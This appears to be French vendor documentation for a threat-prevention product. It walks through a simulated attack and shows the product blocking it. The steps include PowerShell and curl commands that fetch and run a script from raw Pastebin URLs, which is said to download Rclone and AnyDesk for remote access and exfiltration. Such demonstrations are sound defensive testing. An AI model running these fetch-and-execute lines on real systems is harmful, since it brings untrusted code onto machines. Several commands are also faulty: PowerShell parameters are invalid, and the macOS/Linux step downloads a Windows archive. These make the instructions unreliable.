Présentation
La Prévention des menaces agentique est un moteur de sécurité qui applique de manière proactive des contrôles dynamiques en réponse aux menaces détectées pour réduire la surface d'attaque et atténuer les menaces tôt, avant que tout impact ne se produise. Pour plus d'informations, consultez Qu'est-ce que la Prévention des menaces agentique ?
Cet article simule un scénario d'attaque réel pour démontrer comment la Prévention des menaces agentique protège votre réseau. Bien que ceci ne soit pas une menace agissante, cela démontre comment les contrôles sont appliqués pour empêcher l'utilisation de techniques similaires dans une attaque agissante.
Dans cet exemple, un utilisateur télécharge un script depuis Pastebin qu'un attaquant utilise pour tenter de récupérer des outils supplémentaires à haut risque nécessaires pour mener une attaque future. La Prévention des menaces agentique identifie le comportement malveillant et empêche le téléchargement de l'outil, prévenant l'attaque avant qu'elle ne progresse ou qu'un impact ne se produise.
La réponse à cette attaque est entièrement automatisée. Aucune règle supplémentaire n'est requise. Activer simplement la Prévention des menaces agentique suffit à empêcher l'attaque.
Pour simuler cette attaque :
Téléchargez un outil à haut risque sans être bloqué
Téléchargez le script depuis Pastebin
Essayez de télécharger à nouveau les outils à haut risque. Cette fois, le téléchargement est bloqué.
Note : Bien que ce scénario ne soit pas agentique, il illustre comment les contrôles peuvent aider à empêcher l'utilisation de techniques similaires dans les attaques agentiques.
Pré-requis
La Prévention des menaces agentique est activée avec des actions définies sur Bloquer
Étape 1 : Téléchargement d'un outil à haut risque
Pour démontrer que la Prévention des menaces agentique bloque les actions uniquement lorsqu'elles font partie d'une séquence malveillante, téléchargez d'abord Rclone, un outil en ligne de commande open-source pour gérer les fichiers. Les attaquants utilisent couramment Rclone comme outil post-compromission car il est légitime, puissant et se fond dans l'activité administrative normale.
Action
Téléchargez Rclone depuis l'un des sites suivants :
L'URL suivante :
https://downloads.rclone.org/rclone-current-windows-amd64.zipSur les appareils Windows :
La commande PowerShell suivante :
Start-Process "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -Label "RClone"
Sur les appareils macOS/Linux :
La commande Terminal suivante :
curl -sSL "https://downloads.rclone.org/rclone-current-windows-amd64.zip"
Résultat
Le fichier se télécharge avec succès.
Explication
Cela confirme que, isolée, l'action n'est pas bloquée car elle n'est pas considérée comme malveillante lorsqu'elle n'est pas précédée d'une activité suspecte.
Étape 2 : Téléchargement d'un script de Pastebin
Pour simuler le début d'une attaque, téléchargez un script depuis Pastebin qui, une fois exécuté, télécharge des outils d'attaque courants, par exemple, Rclone et AnyDesk pour un accès à distance et l'exfiltration.
Action
Téléchargez et exécutez le script depuis Pastebin :
Sur les appareils Windows :
La commande PowerShell suivante :
(New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/C5VxKUpE')
Sur les appareils macOS/Linux :
La commande Terminal suivante :
curl -sSL "https://pastebin.com/raw/tXhVK2V7"
Résultat
Le script s'exécute et télécharge les outils. Un contrôle dynamique est appliqué à l'hôte, qui est affiché sur la page Menaces Agentique. Pour plus d'informations, consultez Surveillance de la Prévention des menaces agentique
Explication
La Prévention des menaces agentique détecte les indicateurs de comportement suspect et impose de manière proactive des contrôles pour bloquer les actions malveillantes ultérieures, stoppant l'attaque avant que tout impact ne se produise.
Étape 3 : Téléchargement d'un outil à haut risque
Dans l'attaque simulée, l'attaquant tente de télécharger Rclone. Cependant, parce que cette action suit l'activité suspecte de téléchargement du script depuis Pastebin et qu'un contrôle est appliqué, la Prévention des menaces agentique bloque le téléchargement de Rclone.
Action
Téléchargez Rclone en utilisant l'une de ces options :
Directement depuis le site de Rclone :
https://downloads.rclone.org/rclone-current-windows-amd64.zipCette commande PowerShell (sur Windows) :
Start-Process -Url "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -Label "RClone"La commande Terminal suivante (sur macOS/Linux) :
curl -sSL "https://downloads.rclone.org/rclone-current-windows-amd64.zip"
Résultat
Le téléchargement de ce fichier est bloqué par le contrôle. La menace atténuée est affichée sur la page Menaces Agentique.
Explication
Contrairement à l'Étape 1, où ce script a été exécuté isolément et donc autorisé, le téléchargement de ce script a maintenant été précédé d'une action suspecte et est bloqué par la Prévention des menaces agentique.
Démonstration
Cette vidéo présente une démonstration de cette attaque simulée :